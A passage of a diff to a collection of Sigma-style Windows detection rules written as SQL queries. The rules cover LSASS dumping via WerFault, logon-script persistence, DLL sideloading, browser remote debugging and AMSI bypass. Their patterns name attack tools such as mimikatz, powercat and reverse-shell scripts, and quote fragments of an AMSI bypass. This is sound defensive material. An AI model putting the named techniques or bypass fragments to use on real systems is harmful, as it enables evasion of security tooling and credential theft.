"filename": "proc_creation_win_lolbin_offlinescannershell.yml" }, { - "title": "DLL Load By System Process From Suspicious Locations", - "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "title": "Potential Credential Dumping Via WER", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "status": "experimental", - "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential credential dumping via Windows 
Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", + "author": "@pbssubhash , Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND 
CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" ], - "filename": "image_load_susp_dll_load_system_process.yml" + "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack", - "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "title": "Logon Scripts (UserInitMprLogonScript)", + "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1037.001", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\proquota.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" ], - "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": 
"proc_creation_win_persistence_userinitmprlogonscript.yml" }, { - "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", - "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "title": "Wusa Extracting Cab Files", + "id": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", "status": "experimental", - "description": "Detects the image load of vss_ps.dll by uncommon executables", - "author": "Markus Neis, @markus_neis", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.execution" ], "falsepositives": [ - "Unknown" + "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssvc.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\')" ], - "filename": "image_load_dll_vss_ps_susp_load.yml" + "filename": "proc_creation_win_wusa_cab_files_extraction.yml" }, { - "title": "DLL Sideloading Of ShellChromeAPI.DLL", - "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", - "status": "experimental", - "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], + "title": "Suspicious Program Names", + "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "status": "test", + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate tools that accidentally match on the searched patterns" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\CVE-202%' ESCAPE '\\' OR NewProcessName 
LIKE '%\\\\CVE202%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\poc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfuscated.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfusc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" ], - "filename": 
"image_load_side_load_shell_chrome_api.yml" + "filename": "proc_creation_win_susp_progname.yml" }, { - "title": "Suspicious WSMAN Provider Image Loads", - "id": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", - "status": "experimental", - "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Renamed ZOHO Dctask64 Execution", + "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "status": "test", + "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" + "attack.defense_evasion", + "attack.t1036", + "attack.t1055.001", + "attack.t1202", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Unknown yet" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((((ImageLoaded LIKE '%\\\\WsmSvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WsmAuto.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Microsoft.WSMan.Management.ni.dll' ESCAPE '\\') OR OriginalFileName IN ('WsmSvc.dll', 'WSMANAUTOMATION.DLL', 'Microsoft.WSMan.Management.dll')) OR (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND OriginalFileName = 'WsmWmiPl.dll')) AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%svchost.exe -k netsvcs -p -s BITS%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k NetworkService -p -s Wecsvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\')) OR 
((NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Configure-SMRemoting.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ServerManager.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" ], - "filename": "image_load_wsman_provider_image_load.yml" + "filename": "proc_creation_win_renamed_dctask64.yml" }, { - "title": "Potential DLL Sideloading Via comctl32.dll", - "id": "6360757a-d460-456c-8b13-74cf0e60cceb", + "title": "Fsutil Behavior Set SymlinkEvaluation", + "id": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", "status": "experimental", - "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", + "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution", + "attack.t1059" ], 
"falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%behavior %' ESCAPE '\\' AND CommandLine LIKE '%set %' ESCAPE '\\' AND CommandLine LIKE '%SymlinkEvaluation%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_comctl32.yml" + "filename": "proc_creation_win_fsutil_symlinkevaluation.yml" }, { - "title": "Svchost DLL Search Order Hijack", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", + "title": "Xwizard DLL Sideloading", + "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", "status": "test", - "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", - "author": "SBousseaden", + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - 
"attack.persistence", "attack.defense_evasion", - "attack.t1574.002", - "attack.t1574.001" + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Windows installed on non-C drive" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_svchost_dlls.yml" + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" }, { - "title": "UIPromptForCredentials DLLs", - "id": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", + "title": "Browser Started with Remote Debugging", + "id": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", "status": "experimental", - "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.collection", - "attack.t1056.002" + "attack.t1185" ], "falsepositives": [ - "Other legitimate processes loading those DLLs in your environment." 
+ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wincredui.dll' ESCAPE '\\') OR OriginalFileName IN ('credui.dll', 'wincredui.dll')) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\regedit.exe' ESCAPE '\\') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND CommandLine LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\SpotifyAB.SpotifyMusic\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --remote-debugging-%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' AND CommandLine LIKE '% -start-debugger-server%' ESCAPE '\\')))" ], - "filename": "image_load_uipromptforcreds_dlls.yml" + "filename": "proc_creation_win_browsers_remote_debugging.yml" }, { - "title": "Potential Antivirus 
Software DLL Sideloading", - "id": "552b6b65-df37-4d3e-a258-f2fc4771ae54", - "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "Potential AMSI Bypass Via .NET Reflection", + "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "status": "test", + "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", + "author": "Markus Neis, @Kostastsale", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1562.001" ], "falsepositives": [ - "Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.", - "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", - "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((((((ImageLoaded LIKE '%\\\\log.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\TelemetryUtility.exe' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\plugin\\\\log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\log.dll' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Canon\\\\MyPrinter\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\qrt.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program 
Files\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\')))) OR ((ImageLoaded LIKE '%\\\\ashldres.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockdown.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsodscpl.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\McAfee\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\McAfee\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\vftrace.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\wsc.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\tmdbglog.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\DLPPREM32.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\ESET%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\ESET%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_antivirus.yml" + "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" }, { - "title": "HackTool - SharpEvtMute DLL Load", - 
"id": "49329257-089d-46e6-af37-4afce4290685", + "title": "Add New Download Source To Winget", + "id": "05ebafc8-7aa2-4bcd-a269-2aec93f9e842", "status": "experimental", - "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of winget to add new additional download sources", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" - ], - "falsepositives": [ - "Other DLLs with the same Imphash" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b')" - ], - "filename": "image_load_hktl_sharpevtmute.yml" - }, - { - "title": "HackTool - SILENTTRINITY Stager DLL Load", - "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", - "status": "test", - "description": "Detects SILENTTRINITY stager dll loading activity", - "author": "Aleksey Potapov, oscd.community", - "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "False positive are expected with legitimate sources" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE Description LIKE '%st2stager%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\'))" ], - "filename": "image_load_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_winget_add_custom_source.yml" }, { - "title": "Possible Process Hollowing Image Loading", - "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", + "title": "Format.com FileSystem LOLBIN", + "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", 
